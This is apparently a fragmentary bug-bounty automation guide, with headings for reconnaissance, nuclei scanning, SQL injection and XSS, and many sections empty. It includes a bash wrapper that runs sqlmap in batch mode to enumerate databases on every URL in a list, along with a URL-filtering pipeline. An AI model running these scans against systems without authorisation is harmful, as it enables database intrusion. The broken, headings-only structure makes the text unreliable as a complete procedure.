Subdomain

Asset Discovery

Shodan Hacks

Phase 2: Vuln Scanning | Nuclei + Custom Templates

Save as exposed-git.yaml and run:

cat live_hosts.txt | nuclei -t exposed-git.yaml -o git_exposure.txt

Step 2: Parallelize Scans for Speed

Phase 3: Automated Exploitation

Avoid "N/A" or "Duplicate" responses

Step 1: Auto-SQLi with SQLmap + Wrapper

Bash Script for SQLi Testing

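#!/bin/bash
# Save as sqli_scanner.sh
# Runs sqlmap once per URL listed in INPUT_FILE; results are written to ./sqlmap_results
INPUT_FILE="urls_with_params.txt"

# IFS= and -r keep each URL intact (no whitespace trimming, no backslash mangling);
# the || test also processes a final line that lacks a trailing newline
while IFS= read -r url || [ -n "$url" ]; do
  [ -z "$url" ] && continue   # skip blank lines
  sqlmap -u "$url" --batch --random-agent --level 3 --risk 2 --dbs --output-dir=./sqlmap_results
done < "$INPUT_FILE"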

Extract URLs with Parameters:

cat urls.txt | grep -E '\.php\?id=|\.asp\?q=' | qsreplace "FUZZ" | anew urls_with_params.txt

Step 2: XSS Automation with Dalfox + XSS Hunter

Phase 4: Traffic Analysis | Catch Edge Cases

Automate Burp Suite for auth/logic flaws.

Step 1: Burp Macro for Auth Flows

1. Record a Macro: